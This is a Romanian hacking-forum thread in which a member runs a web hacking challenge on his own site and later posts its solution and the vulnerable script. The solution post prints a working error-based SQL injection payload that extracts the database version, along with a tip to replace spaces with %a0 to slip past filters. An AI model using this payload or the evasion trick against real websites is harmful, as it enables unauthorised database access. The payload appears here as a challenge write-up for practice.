Jump to content
dancezar

Try this challenge

Recommended Posts

  • Active Members

TargeT : http://danyweb-challenge.host56.com/

Misiunea este simpla gasiti o vurnerabilitate nu conteaza ce,exploatati-o si scrieti-va numele pe index.

Am introdus doua inregistrari pe index ca sa fac niste teste.

Reguli:

-Nu divulgati numele vurnerabilitati pe care ati gasit-o sau cuvinte care ar avea legatura cu aceasta

-Trimiteti-mi pe pm rezolvarea

-Postati un post cu poza numelui tau de pe index (doar index-ul nu altceva), in thread-ul acesta ca sa dovedesti ca numele de pe index este al tau.

-Nu dati alte hinturi

Solveri:

-askwrite

Edited by danyweb09
Link to comment
Share on other sites

  • Active Members

Challenge.close()

Rezolvarea se afla aici.

La sqli nu s-au gandit decat 3-4 persoane.

Pentru cei care vor sa il incerce aici aveti arhiva cu scriptul:

https://www.mediafire.com/?aqizkdm2tm1yddy

Setati datele de conectare la DB in index.php,admin.php si /image/index.php apoi executati fiserul sql in phpmyadmin

Sintaxa folosita: ",(select count("ceva") from(select 1 union select 2 union select 3)x group by concat((select @@version),floor(rand(0)^2)))#

Cu %a0 in loc de spatii

Edited by danyweb09
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...